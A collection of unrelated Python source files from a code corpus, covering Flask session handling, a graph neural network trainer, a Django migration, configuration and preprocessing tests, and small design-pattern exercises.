'''Prints and formats a row of y values for a given x'''
#TODO: (Extend and edit as you see fit to help you debug your methods)
print("{0:4.1f} \t {1:6.10f} \t {2:6.10f} \t {3:6.3f}%".format(x, y_e, y, ns.error(y_e, y) * 100))
def PrintAll(X,Y,Y_e):
'''Prints debugging data to terminal'''
#TODO: (Extend and edit as you see fit to help you debug your methods)
PrintHeader()
for i in range(0,len(X)):
PrintIt(X[i], Y_e[i], Y[i])
def PrintToFile(name, path=''):
'''Prints caculated data to file'''
#TODO: Extend this to have the functionality to print to file (with an optional path)
return None
def Plot(X,Y,c,m=''):
'''Plots caculated data to chart'''
#TODO: (Extend and edit as you see fit to help visualize your work)
plt.plot(X,Y, 'bo', color=c, marker=m, linestyle='-')
|
StarcoderdataPython
|
9703875
|
<filename>utils/sso.py<gh_stars>10-100
# -*- coding: utf-8 -*-
import json
from urllib import urlencode
from urllib2 import urlopen
from functools import wraps
from urlparse import urlparse, parse_qs
from flask import redirect, request, session, jsonify, abort
from modules import Admin, Cluster, Msg
def logout(uesr):
session.pop('user', None)
return redirect('/Login')
def require_login(f):
@wraps(f)
def decorated_function(*args, **kwargs):
if 'user' not in session:
return redirect('/Login')
user = session['user']
user_data = Admin.get(nid=user['nid'], status=1)
user['msg'] = []
user['cluster'] = []
clusters_data = Cluster.get_all(status=1)
msg = Msg.get_all(status=1, msg_status=1, user=user['nid'])
for a in clusters_data:
if a.status == 1:
# 按创建时间排序
clusters = {'name': a.name, 'id': a.id, 'nid': a.nid, 'gmt_created': a.gmt_created}
user['cluster'].append(clusters)
user['cluster'].sort(key=lambda x: x['gmt_created'], reverse=False)
user['msg_num'] = len(msg)
for m in msg[0:3]:
try:
user['msg'].append({
'nid': m.nid,
'time': m.gmt_created,
'content': json.loads(m.content),
'genre': m.genre
})
except Exception as e:
str(e)
kwargs['user'] = user
return f(*args, **kwargs)
return decorated_function
|
StarcoderdataPython
|
3491661
|
<gh_stars>10-100
import numpy as np
from visual_dynamics.utils import transformations as tf
from visual_dynamics.spaces import Space
class AxisAngleSpace(Space):
"""
SO(3) space where the rotation is represented as an axis-angle vector in
R^3 where its magnitude is constrained within an interval and the axis can
optionally be constrained. If the axis is not constrained, then the
absolute value of low and high should be equal to each other.
"""
def __init__(self, low, high, axis=None):
"""
TODO: handle angle wrap-around
"""
self.low = np.squeeze(low)[None]
self.high = np.squeeze(high)[None]
if self.low.shape != (1,) or self.high.shape != (1,):
raise ValueError("low and high should each contain a single number or be a single number")
self.axis = axis / np.linalg.norm(axis) if axis is not None else None
if self.axis is None:
assert -self.low == self.high
def sample(self):
if self.axis is None:
axis_angle = tf.axis_angle_from_matrix(tf.random_rotation_matrix())
axis, angle = tf.split_axis_angle(axis_angle)
if not (self.low <= angle <= self.high):
# rescale angle from [-pi, pi) to [-low_angle, high_angle)
angle = self.low + (self.high - self.low) * (angle + np.pi) / (2 * np.pi)
return angle * axis
else:
angle = np.random.uniform(low=self.low, high=self.high, size=self.shape)
return angle
def contains(self, x):
angle = np.linalg.norm(x)
return x.shape == self.shape and (self.low <= angle <= self.high)
def clip(self, x, out=None):
assert x.shape == self.shape
if self.axis is None:
axis, angle = tf.split_axis_angle(x)
x_clipped = np.clip(angle, self.low, self.high) * axis
else:
x_clipped = np.clip(x, self.low, self.high)
if out is not None:
out[:] = x_clipped
x_clipped = out
return x_clipped
@property
def shape(self):
"""
shape of data that this space handles
"""
if self.axis is None:
return (3,)
else:
return (1,)
def _get_config(self):
config = super(AxisAngleSpace, self)._get_config()
config.update({'low': np.asscalar(self.low),
'high': np.asscalar(self.high),
'axis': self.axis.tolist() if self.axis is not None else None})
return config
@staticmethod
def create(other):
return AxisAngleSpace(other.low, other.high, axis=other.axis)
|
StarcoderdataPython
|
12838179
|
<filename>lab1/abstractFactory.py
'''Define Abstract Factory'''
from abc import ABCMeta, abstractmethod
class Snack:
pass
class Beer:
pass
class Beer(metaclass=ABCMeta):
@abstractmethod
def interact(self, snack: Snack):
pass
class Snack(metaclass=ABCMeta):
@abstractmethod
def interact(self, beer: Beer):
pass
class Tuborg(Beer):
def interact(self, snack: Snack):
print('I buy beer {0} and {1}'.format( \
self.__class__.__name__, snack.__class__.__name__.lower()))
class Staropramen(Beer):
def interact(self, snack: Snack):
print('I buy beer {0} and {1}'.format( \
self.__class__.__name__, snack.__class__.__name__.lower()))
class AbstractShop(metaclass=ABCMeta):
@abstractmethod
def buy_beer(self) -> Beer:
pass
@abstractmethod
def buy_snack(self) -> Snack:
pass
class Peanuts(Snack):
def interact(self, beer: Beer):
print('I buy beer {0} and {1}'.format( \
beer.__class__.__name__, self.__class__.__name__.lower()))
class Chips(Snack):
def interact(self, beer: Beer):
print('I buy beer {0} and {1}'.format( \
beer.__class__.__name__, self.__class__.__name__.lower()))
class EcoMarket(AbstractShop):
def buy_beer(self) -> Beer:
return Tuborg()
def buy_snack(self) -> Snack:
return Peanuts()
class Silpo(AbstractShop):
def buy_beer(self) -> Beer:
return Staropramen()
def buy_snack(self) -> Snack:
return Chips()
'''Using AbstractFactory'''
firstShop = EcoMarket()
lastShop = Silpo()
beer = firstShop.buy_beer()
snack = lastShop.buy_snack()
snack.interact(beer)
beer.interact(snack)
beer = lastShop.buy_beer()
snack = firstShop.buy_snack()
snack.interact(beer)
beer.interact(snack)
|
StarcoderdataPython
|
9729583
|
import json
import time
import torch
import random
import numpy as np
import pandas as pd
from tqdm import trange
import torch.nn.init as init
from torch.nn import Parameter
import torch.nn.functional as F
from utils import calculate_auc, setup_features
from sklearn.model_selection import train_test_split
from signedsageconvolution import SignedSAGEConvolutionBase, SignedSAGEConvolutionDeep, ListModule
class SignedGraphConvolutionalNetwork(torch.nn.Module):
"""
Signed Graph Convolutional Network Class.
For details see: Signed Graph Convolutional Network. <NAME>, <NAME>, and <NAME> ICDM, 2018.
https://arxiv.org/abs/1808.06354
"""
def __init__(self, device, args, X):
super(SignedGraphConvolutionalNetwork, self).__init__()
"""
SGCN Initialization.
:param device: Device for calculations.
:param args: Arguments object.
:param X: Node features.
"""
self.args = args
torch.manual_seed(self.args.seed)
self.device = device
self.X = X
self.setup_layers()
def setup_layers(self):
"""
Adding Base Layers, Deep Signed GraphSAGE layers and Regression Parameters if the model is not a single layer model.
"""
self.nodes = range(self.X.shape[0])
self.neurons = self.args.layers
self.layers = len(self.neurons)
self.positive_base_aggregator = SignedSAGEConvolutionBase(self.X.shape[1]*2, self.neurons[0]).to(self.device)
self.negative_base_aggregator = SignedSAGEConvolutionBase(self.X.shape[1]*2, self.neurons[0]).to(self.device)
self.positive_aggregators = []
self.negative_aggregators = []
for i in range(1,self.layers):
self.positive_aggregators.append(SignedSAGEConvolutionDeep(3*self.neurons[i-1], self.neurons[i]).to(self.device))
self.negative_aggregators.append(SignedSAGEConvolutionDeep(3*self.neurons[i-1], self.neurons[i]).to(self.device))
self.positive_aggregators = ListModule(*self.positive_aggregators)
self.negative_aggregators = ListModule(*self.negative_aggregators)
self.regression_weights = Parameter(torch.Tensor(4*self.neurons[-1], 3))
init.xavier_normal_(self.regression_weights)
def calculate_regression_loss(self,z, target):
"""
Calculating the regression loss for all pairs of nodes.
:param z: Hidden vertex representations.
:param target: Target vector.
:return loss_term: Regression loss.
:return predictions_soft: Predictions for each vertex pair.
"""
pos = torch.cat((self.positive_z_i, self.positive_z_j),1)
neg = torch.cat((self.negative_z_i, self.negative_z_j),1)
surr_neg_i = torch.cat((self.negative_z_i, self.negative_z_k),1)
surr_neg_j = torch.cat((self.negative_z_j, self.negative_z_k),1)
surr_pos_i = torch.cat((self.positive_z_i, self.positive_z_k),1)
surr_pos_j = torch.cat((self.positive_z_j, self.positive_z_k),1)
features = torch.cat((pos,neg,surr_neg_i,surr_neg_j,surr_pos_i,surr_pos_j))
predictions = torch.mm(features,self.regression_weights)
predictions_soft = F.log_softmax(predictions, dim=1)
loss_term = F.nll_loss(predictions_soft, target)
return loss_term, predictions_soft
def calculate_positive_embedding_loss(self, z, positive_edges):
"""
Calculating the loss on the positive edge embedding distances
:param z: Hidden vertex representation.
:param positive_edges: Positive training edges.
:return loss_term: Loss value on positive edge embedding.
"""
self.positive_surrogates = [random.choice(self.nodes) for node in range(positive_edges.shape[1])]
self.positive_surrogates = torch.from_numpy(np.array(self.positive_surrogates, dtype=np.int64).T).type(torch.long).to(self.device)
positive_edges = torch.t(positive_edges)
self.positive_z_i, self.positive_z_j = z[positive_edges[:,0],:],z[positive_edges[:,1],:]
self.positive_z_k = z[self.positive_surrogates,:]
norm_i_j = torch.norm(self.positive_z_i-self.positive_z_j, 2, 1, True).pow(2)
norm_i_k = torch.norm(self.positive_z_i-self.positive_z_k, 2, 1, True).pow(2)
term = norm_i_j-norm_i_k
term[term<0] = 0
loss_term = term.mean()
return loss_term
def calculate_negative_embedding_loss(self, z, negative_edges):
"""
Calculating the loss on the negative edge embedding distances
:param z: Hidden vertex representation.
:param negative_edges: Negative training edges.
:return loss_term: Loss value on negative edge embedding.
"""
self.negative_surrogates = [random.choice(self.nodes) for node in range(negative_edges.shape[1])]
self.negative_surrogates = torch.from_numpy(np.array(self.negative_surrogates, dtype=np.int64).T).type(torch.long).to(self.device)
negative_edges = torch.t(negative_edges)
self.negative_z_i, self.negative_z_j = z[negative_edges[:,0],:], z[negative_edges[:,1],:]
self.negative_z_k = z[self.negative_surrogates,:]
norm_i_j = torch.norm(self.negative_z_i-self.negative_z_j, 2, 1, True).pow(2)
norm_i_k = torch.norm(self.negative_z_i-self.negative_z_k, 2, 1, True).pow(2)
term = norm_i_k-norm_i_j
term[term<0] = 0
loss_term = term.mean()
return loss_term
def calculate_loss_function(self, z, positive_edges, negative_edges, target):
"""
Calculating the embedding losses, regression loss and weight regularization loss.
:param z: Node embedding.
:param positive_edges: Positive edge pairs.
:param negative_edges: Negative edge pairs.
:param target: Target vector.
:return loss: Value of loss.
"""
loss_term_1 = self.calculate_positive_embedding_loss(z, positive_edges)
loss_term_2 = self.calculate_negative_embedding_loss(z, negative_edges)
regression_loss, self.predictions = self.calculate_regression_loss(z,target)
loss_term = regression_loss+self.args.lamb*(loss_term_1+loss_term_2)
return loss_term
def forward(self, positive_edges, negative_edges, target):
"""
Model forward propagation pass. Can fit deep and single layer SGCN models.
:param positive_edges: Positive edges.
:param negative_edges: Negative edges.
:param target: Target vectors.
:return loss: Loss value.
:return self.z: Hidden vertex representations.
"""
self.h_pos, self.h_neg = [],[]
self.h_pos.append(torch.tanh(self.positive_base_aggregator(self.X, positive_edges)))
self.h_neg.append(torch.tanh(self.negative_base_aggregator(self.X, negative_edges)))
for i in range(1,self.layers):
self.h_pos.append(torch.tanh(self.positive_aggregators[i-1](self.h_pos[i-1],self.h_neg[i-1], positive_edges, negative_edges)))
self.h_neg.append(torch.tanh(self.negative_aggregators[i-1](self.h_neg[i-1],self.h_pos[i-1], positive_edges, negative_edges)))
self.z = torch.cat((self.h_pos[-1], self.h_neg[-1]), 1)
loss = self.calculate_loss_function(self.z, positive_edges, negative_edges, target)
return loss, self.z
class SignedGCNTrainer(object):
"""
Object to train and score the SGCN, log the model behaviour and save the output.
"""
def __init__(self, args, edges):
"""
Constructing the trainer instance and setting up logs.
:param args: Arguments object.
:param edges: Edge data structure with positive and negative edges separated.
"""
self.args = args
self.edges = edges
self.device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
self.setup_logs()
def setup_logs(self):
"""
Creating a log dictionary.
"""
self.logs = {}
self.logs["parameters"] = vars(self.args)
self.logs["performance"] = [["Epoch","AUC","F1"]]
self.logs["training_time"] = [["Epoch","Seconds"]]
def setup_dataset(self):
"""
Creating train and test split.
"""
self.positive_edges, self.test_positive_edges = train_test_split(self.edges["positive_edges"], test_size = self.args.test_size)
self.negative_edges, self.test_negative_edges = train_test_split(self.edges["negative_edges"], test_size = self.args.test_size)
self.ecount = len(self.positive_edges + self.negative_edges)
self.X = setup_features(self.args, self.positive_edges, self.negative_edges, self.edges["ncount"])
self.positive_edges = torch.from_numpy(np.array(self.positive_edges, dtype=np.int64).T).type(torch.long).to(self.device)
self.negative_edges = torch.from_numpy(np.array(self.negative_edges, dtype=np.int64).T).type(torch.long).to(self.device)
self.y = np.array([0 if i< int(self.ecount/2) else 1 for i in range(self.ecount)] +[2]*(self.ecount*2))
self.y = torch.from_numpy(self.y).type(torch.LongTensor).to(self.device)
self.X = torch.from_numpy(self.X).float().to(self.device)
def score_model(self, epoch):
"""
Score the model on the test set edges in each epoch.
:param epoch: Epoch number.
"""
loss, self.train_z = self.model(self.positive_edges, self.negative_edges, self.y)
score_positive_edges = torch.from_numpy(np.array(self.test_positive_edges, dtype=np.int64).T).type(torch.long).to(self.device)
score_negative_edges = torch.from_numpy(np.array(self.test_negative_edges, dtype=np.int64).T).type(torch.long).to(self.device)
test_positive_z = torch.cat((self.train_z[score_positive_edges[0,:],:], self.train_z[score_positive_edges[1,:],:]),1)
test_negative_z = torch.cat((self.train_z[score_negative_edges[0,:],:], self.train_z[score_negative_edges[1,:],:]),1)
scores = torch.mm(torch.cat((test_positive_z, test_negative_z),0), self.model.regression_weights.to(self.device))
probability_scores = torch.exp(F.softmax(scores, dim=1))
predictions = probability_scores[:,0]/probability_scores[:,0:2].sum(1)
predictions = predictions.cpu().detach().numpy()
targets = [0]*len(self.test_positive_edges) + [1]*len(self.test_negative_edges)
auc, f1 = calculate_auc(targets, predictions, self.edges)
self.logs["performance"].append([epoch+1, auc, f1])
def create_and_train_model(self):
"""
Model training and scoring.
"""
print("\nTraining started.\n")
self.model = SignedGraphConvolutionalNetwork(self.device, self.args, self.X).to(self.device)
self.optimizer = torch.optim.Adam(self.model.parameters(), lr=self.args.learning_rate, weight_decay=self.args.weight_decay)
self.model.train()
self.epochs = trange(self.args.epochs, desc="Loss")
for epoch in self.epochs:
start_time = time.time()
self.optimizer.zero_grad()
loss, _ = self.model(self.positive_edges, self.negative_edges, self.y)
loss.backward()
self.epochs.set_description("SGCN (Loss=%g)" % round(loss.item(),4))
self.optimizer.step()
self.logs["training_time"].append([epoch+1,time.time()-start_time])
if self.args.test_size >0:
self.score_model(epoch)
def save_model(self):
"""
Saving the embedding and model weights.
"""
print("\nEmbedding is saved.\n")
self.train_z = self.train_z.cpu().detach().numpy()
embedding_header = ["id"] + ["x_" + str(x) for x in range(self.train_z.shape[1])]
self.train_z = np.concatenate([np.array(range(self.train_z.shape[0])).reshape(-1,1),self.train_z],axis=1)
self.train_z = pd.DataFrame(self.train_z, columns = embedding_header)
self.train_z.to_csv(self.args.embedding_path, index = None)
print("\nRegression weights are saved.\n")
self.regression_weights = self.model.regression_weights.cpu().detach().numpy().T
regression_header = ["x_" + str(x) for x in range(self.regression_weights.shape[1])]
self.regression_weights = pd.DataFrame(self.regression_weights, columns = regression_header)
self.regression_weights.to_csv(self.args.regression_weights_path, index = None)
|
StarcoderdataPython
|
5164940
|
<filename>src/apps/profiles/migrations/0011_auto_20200824_2337.py
# Generated by Django 3.0.9 on 2020-08-24 23:37
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('recipes', '0015_ingredient_notes'),
('profiles', '0010_auto_20200817_1355'),
]
operations = [
migrations.AddField(
model_name='profile',
name='recipes_cooked',
field=models.ManyToManyField(related_name='profile', to='recipes.Recipe'),
),
migrations.AlterField(
model_name='event',
name='only_host_inventory',
field=models.BooleanField(default=False),
),
]
|
StarcoderdataPython
|
3225594
|
<gh_stars>1-10
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Test class :mod:`pydolphinscheduler.core.configuration`' method."""
import importlib
import os
from pathlib import Path
from typing import Any
import pytest
from pydolphinscheduler.core import configuration
from pydolphinscheduler.core.configuration import (
BUILD_IN_CONFIG_PATH,
config_path,
get_single_config,
set_single_config,
)
from pydolphinscheduler.exceptions import PyDSConfException
from pydolphinscheduler.utils.yaml_parser import YamlParser
from tests.testing.constants import DEV_MODE, ENV_PYDS_HOME
from tests.testing.file import get_file_content
@pytest.fixture
def teardown_file_env():
"""Util for deleting temp configuration file and pop env var after test finish."""
yield
config_file_path = config_path()
if config_file_path.exists():
config_file_path.unlink()
os.environ.pop(ENV_PYDS_HOME, None)
@pytest.mark.parametrize(
"val, expect",
[
("1", 1),
("123", 123),
("4567", 4567),
(b"1234", 1234),
],
)
def test_get_int(val: Any, expect: int):
"""Test function :func:`configuration.get_int`."""
assert configuration.get_int(val) == expect
@pytest.mark.parametrize(
"val",
[
"a",
"1a",
"1d2",
"1723-",
],
)
def test_get_int_error(val: Any):
"""Test function :func:`configuration.get_int`."""
with pytest.raises(ValueError):
configuration.get_int(val)
@pytest.mark.parametrize(
"val, expect",
[
("t", True),
("true", True),
(1, True),
(True, True),
("f", False),
("false", False),
(0, False),
(123, False),
("abc", False),
("abc1", False),
(False, False),
],
)
def test_get_bool(val: Any, expect: bool):
"""Test function :func:`configuration.get_bool`."""
assert configuration.get_bool(val) == expect
@pytest.mark.parametrize(
"home, expect",
[
(None, "~/pydolphinscheduler/config.yaml"),
("/tmp/pydolphinscheduler", "/tmp/pydolphinscheduler/config.yaml"),
("/tmp/test_abc", "/tmp/test_abc/config.yaml"),
],
)
def test_config_path(home: Any, expect: str):
"""Test function :func:`config_path`."""
if home:
os.environ[ENV_PYDS_HOME] = home
assert Path(expect).expanduser() == configuration.config_path()
@pytest.mark.parametrize(
"home",
[
None,
"/tmp/pydolphinscheduler",
"/tmp/test_abc",
],
)
def test_init_config_file(teardown_file_env, home: Any):
"""Test init config file."""
if home:
os.environ[ENV_PYDS_HOME] = home
elif DEV_MODE:
pytest.skip(
"Avoid delete ~/pydolphinscheduler/config.yaml by accident when test locally."
)
assert not config_path().exists()
configuration.init_config_file()
assert config_path().exists()
assert get_file_content(config_path()) == get_file_content(BUILD_IN_CONFIG_PATH)
@pytest.mark.parametrize(
"home",
[
None,
"/tmp/pydolphinscheduler",
"/tmp/test_abc",
],
)
def test_init_config_file_duplicate(teardown_file_env, home: Any):
"""Test raise error with init config file which already exists."""
if home:
os.environ[ENV_PYDS_HOME] = home
elif DEV_MODE:
pytest.skip(
"Avoid delete ~/pydolphinscheduler/config.yaml by accident when test locally."
)
assert not config_path().exists()
configuration.init_config_file()
assert config_path().exists()
with pytest.raises(PyDSConfException, match=".*file already exists.*"):
configuration.init_config_file()
def test_get_configs_build_in():
"""Test function :func:`get_configs` with build-in config file."""
content = get_file_content(BUILD_IN_CONFIG_PATH)
assert YamlParser(content).src_parser == configuration.get_configs().src_parser
assert YamlParser(content).dict_parser == configuration.get_configs().dict_parser
@pytest.mark.parametrize(
"key, val, new_val",
[
("java_gateway.address", "127.0.0.1", "127.1.1.1"),
("java_gateway.port", 25333, 25555),
("java_gateway.auto_convert", True, False),
("default.user.name", "userPythonGateway", "editUserPythonGateway"),
("default.user.password", "<PASSWORD>", "editUserPythonGateway"),
(
"default.user.email",
"<EMAIL>",
"<EMAIL>",
),
("default.user.phone", 11111111111, 22222222222),
("default.user.state", 1, 0),
("default.workflow.project", "project-pydolphin", "eidt-project-pydolphin"),
("default.workflow.tenant", "tenant_pydolphin", "edit_tenant_pydolphin"),
("default.workflow.user", "userPythonGateway", "editUserPythonGateway"),
("default.workflow.queue", "queuePythonGateway", "editQueuePythonGateway"),
("default.workflow.worker_group", "default", "specific"),
("default.workflow.time_zone", "Asia/Shanghai", "Asia/Beijing"),
("default.workflow.warning_type", "NONE", "ALL"),
],
)
def test_single_config_get_set(teardown_file_env, key: str, val: Any, new_val: Any):
"""Test function :func:`get_single_config` and :func:`set_single_config`."""
assert val == get_single_config(key)
set_single_config(key, new_val)
assert new_val == get_single_config(key)
def test_single_config_get_set_not_exists_key():
"""Test function :func:`get_single_config` and :func:`set_single_config` error while key not exists."""
not_exists_key = "i_am_not_exists_key"
with pytest.raises(PyDSConfException, match=".*do not exists.*"):
get_single_config(not_exists_key)
with pytest.raises(PyDSConfException, match=".*do not exists.*"):
set_single_config(not_exists_key, not_exists_key)
@pytest.mark.parametrize(
"config_name, expect",
[
("JAVA_GATEWAY_ADDRESS", "127.0.0.1"),
("JAVA_GATEWAY_PORT", 25333),
("JAVA_GATEWAY_AUTO_CONVERT", True),
("USER_NAME", "userPythonGateway"),
("USER_PASSWORD", "<PASSWORD>"),
("USER_EMAIL", "<EMAIL>"),
("USER_PHONE", "11111111111"),
("USER_STATE", 1),
("WORKFLOW_PROJECT", "project-pydolphin"),
("WORKFLOW_TENANT", "tenant_pydolphin"),
("WORKFLOW_USER", "userPythonGateway"),
("WORKFLOW_QUEUE", "queuePythonGateway"),
("WORKFLOW_WORKER_GROUP", "default"),
("WORKFLOW_TIME_ZONE", "Asia/Shanghai"),
("WORKFLOW_WARNING_TYPE", "NONE"),
],
)
def test_get_configuration(config_name: str, expect: Any):
"""Test get exists attribute in :mod:`configuration`."""
assert expect == getattr(configuration, config_name)
@pytest.mark.parametrize(
"config_name, src, dest",
[
("JAVA_GATEWAY_ADDRESS", "127.0.0.1", "192.168.1.1"),
("JAVA_GATEWAY_PORT", 25333, 25334),
("JAVA_GATEWAY_AUTO_CONVERT", True, False),
("USER_NAME", "userPythonGateway", "envUserPythonGateway"),
("USER_PASSWORD", "<PASSWORD>", "envUserPythonGateway"),
(
"USER_EMAIL",
"<EMAIL>",
"<EMAIL>",
),
("USER_PHONE", "11111111111", "22222222222"),
("USER_STATE", 1, 0),
("WORKFLOW_PROJECT", "project-pydolphin", "env-project-pydolphin"),
("WORKFLOW_TENANT", "tenant_pydolphin", "env-tenant_pydolphin"),
("WORKFLOW_USER", "userPythonGateway", "envUserPythonGateway"),
("WORKFLOW_QUEUE", "queuePythonGateway", "envQueuePythonGateway"),
("WORKFLOW_WORKER_GROUP", "default", "custom"),
("WORKFLOW_TIME_ZONE", "Asia/Shanghai", "America/Los_Angeles"),
("WORKFLOW_WARNING_TYPE", "NONE", "ALL"),
],
)
def test_get_configuration_env(config_name: str, src: Any, dest: Any):
"""Test get exists attribute from environment variable in :mod:`configuration`."""
assert getattr(configuration, config_name) == src
env_name = f"PYDS_{config_name}"
os.environ[env_name] = str(dest)
# reload module configuration to re-get config from environment.
importlib.reload(configuration)
assert getattr(configuration, config_name) == dest
# pop and reload configuration to test whether this config equal to `src` value
os.environ.pop(env_name, None)
importlib.reload(configuration)
assert getattr(configuration, config_name) == src
assert env_name not in os.environ
|
StarcoderdataPython
|
9607763
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
The ``nti.testing`` module exposes the most commonly used API from the
submodules (for example, ``nti.testing.is_true`` is just an alias for
``nti.testing.matchers.is_true``). The submodules may contain other
functions, though, so be sure to look at their documentation.
Importing this module has side-effects when :mod:`zope.testing` is
importable:
- Add a zope.testing cleanup to ensure that transactions never
last past the boundary of a test. If a test begins a transaction
and then fails to abort or commit it, subsequent uses of the
transaction package may find that they are in a bad state,
unable to clean up resources. For example, the dreaded
``ConnectionStateError: Cannot close a connection joined to a
transaction``.
- A zope.testing cleanup also ensures that the global transaction
manager is in its default implicit mode, at least for the
current thread.
.. versionchanged:: 3.1.0
The :mod:`mock` module, or its backwards compatibility backport for
Python 2.7, is now available as an attribute of this module, and as
the module named ``nti.testing.mock``. Thus, for compatibility with
both Python 2 and Python 3, you can write ``from nti.testing import
mock`` or ``from nti.testing.mock import Mock``, or even just
``from nti.testing import Mock``.
.. versionchanged:: 3.1.0
Expose the most commonly used attributes of some submodules as API on this
module itself.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import transaction
import zope.testing.cleanup
from . import mock
from .mock import Mock
from .matchers import is_true
from .matchers import is_false
from .matchers import provides
from .matchers import implements
from .matchers import verifiably_provides
from .matchers import validly_provides
from .matchers import validated_by
from .matchers import not_validated_by
from .matchers import aq_inContextOf
from .time import time_monotonically_increases
__docformat__ = "restructuredtext en"
def transactionCleanUp():
"""
Implement the transaction cleanup described in the module documentation.
"""
try:
transaction.abort()
except transaction.interfaces.NoTransaction:
# An explicit transaction manager, with nothing
# to do. Perfect.
pass
finally:
# Note that we don't catch any other transaction errors.
# Those usually mean there's a bug in a resource manager joined
# to the transaction and it should fail the test.
transaction.manager.explicit = False
zope.testing.cleanup.addCleanUp(transactionCleanUp)
__all__ = [
# Things defined here we want to export
# if they do 'from nti.testing import *'
# This also defines what Sphinx documents for this module.
'transactionCleanUp',
'mock',
'Mock',
# API Convenience exports.
# * matchers
'is_true',
'is_false',
'provides',
'implements',
'verifiably_provides',
'validly_provides',
'validated_by',
'not_validated_by',
'aq_inContextOf',
# * time
'time_monotonically_increases',
# Sub-modules that should be imported with
# * imports as well. We generally don't want anything
# imported; it's better to use direct imports.
]
|
StarcoderdataPython
|
1898935
|
from collections import defaultdict
import pytest
from transformers import AutoTokenizer, T5ForConditionalGeneration, DataCollatorForSeq2Seq, T5Config
from datasets import load_dataset, set_caching_enabled, Dataset
from promptsource.templates import DatasetTemplates
from src.preprocessors import ThreeChoiceEntailmentPreprocessor, TaskMode
from src import preprocessing
@pytest.mark.parametrize("use_preprocessor", [True, False], ids=["Preprocessor", "NoPreprocesser"])
def test_preprocess_dataset(use_preprocessor):
set_caching_enabled(False)
ds = load_dataset("anli", split="train_r1[:3]")
tokenizer = AutoTokenizer.from_pretrained('t5-small')
prompt_task = 'anli'
prompt_name = 'can we infer'
task_prompt_templates = DatasetTemplates(prompt_task)
prompt = task_prompt_templates[prompt_name]
prompt.metadata.task_mode = "ENTAILMENT"
prompt.metadata.is_mcq = False
preprocessor = None
if use_preprocessor:
preprocessor = ThreeChoiceEntailmentPreprocessor()
prompt.answer_choices = " ||| ".join(preprocessor.choices)
result, original, choice_set_tokenized = preprocessing.preprocess_dataset(
"test",
ds,
tokenizer,
prompt=prompt,
batch_size=1,
num_proc=1,
preprocessor=preprocessor
)
assert len(result) == 3 * len(ds)
assert len(original) == len(ds)
if preprocessor:
choices = preprocessor.choices
else:
choices = map(lambda s: s.strip(), prompt.answer_choices.split("|||"))
assert choice_set_tokenized == list(map(
lambda c: tokenizer(c, add_special_tokens=False)['input_ids'],
choices
))
def apply_prompt_to_ds(ex, idx):
prompt_str, output_str = prompt.apply(ex)
choices = prompt.get_answer_choices_list(ex) or []
out = {
"prompt" : prompt_str,
"output" : output_str,
"choices": choices,
"idx" : idx
}
if preprocessor:
out['choice_string'] = preprocessor.choice_string
out['domain'] = "entailment"
return out
expected_original = ds.map(
apply_prompt_to_ds,
with_indices=True,
remove_columns=['uid', 'reason'] if preprocessor else []
)
expected_rank_choices = defaultdict(list)
for i, (actual, expected) in enumerate(
zip(original.sort('idx'), expected_original.sort('idx'))
):
assert set(actual) == set(expected)
for k, expected_value in expected.items():
assert actual[k] == expected_value, f"result[{i}][{k}] is incorrect"
for j, choice in enumerate(expected['choices']):
expected_rank_choices['idx'].append([i, j])
expected_rank_choices["inputs"].append(expected['prompt'])
expected_rank_choices['is_correct'].append(choice == expected['output'].strip())
expected_rank_choices['targets'].append(choice)
expected_rank_choices = Dataset.from_dict(
expected_rank_choices
)
expected_rank_choices = expected_rank_choices.map(
lambda ex: preprocessing.tokenize_rank_choices(ex, tokenizer, 1, True),
remove_columns=expected_rank_choices.column_names
).map(
lambda ex: {'real_idx': 3 * ex['ex_idx'] + ex['choice_idx']}
).sort('real_idx')
result_ds = result.map(
lambda ex: {'real_idx': 3 * ex['ex_idx'] + ex['choice_idx']}
).sort('real_idx')
for i, (actual, expected) in enumerate(zip(result_ds, expected_rank_choices)):
assert set(actual) == set(expected)
for k, expected_value in expected.items():
assert actual[k] == expected_value, f"result[{i}][{k}] is incorrect"
set_caching_enabled(True)
def test_tokenize_rank_choices():
tokenizer = AutoTokenizer.from_pretrained('t5-small')
ex = {
"idx" : [0, 1],
"inputs" : b"Shake and Bake",
"targets" : b"Ricky Bobby",
"is_correct": True
}
inputs_tok = tokenizer(ex['inputs'].decode('utf-8'))
targets_tok = tokenizer(
ex['targets'].decode('utf-8'),
max_length=6,
padding="max_length"
)
result = preprocessing.tokenize_rank_choices(ex, tokenizer, 5)
assert set(result) == {"idx", "input_ids", "attention_mask", "labels", "is_correct",
"input_len", "labels_len", "ex_idx", "choice_idx",
"labels_attention_mask"}
assert result['idx'] == [0, 1]
assert result['ex_idx'] == 0
assert result['choice_idx'] == 1
assert result['is_correct'] == True
assert result['labels'] == targets_tok['input_ids']
assert result['input_ids'] == inputs_tok['input_ids']
assert result['attention_mask'] == inputs_tok['attention_mask']
assert result['input_len'] == len(inputs_tok['input_ids'])
assert result['labels_len'] == sum(targets_tok['attention_mask'])
|
StarcoderdataPython
|
11263271
|
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains vanilla BERT encoder."""
from typing import Dict, Tuple
import flax.linen as nn
import jax.numpy as jnp
from language.mentionmemory.encoders import base_encoder
from language.mentionmemory.encoders import encoder_registry
from language.mentionmemory.modules import embedding
from language.mentionmemory.modules import transformer
from language.mentionmemory.utils import default_values
from language.mentionmemory.utils import jax_utils as jut
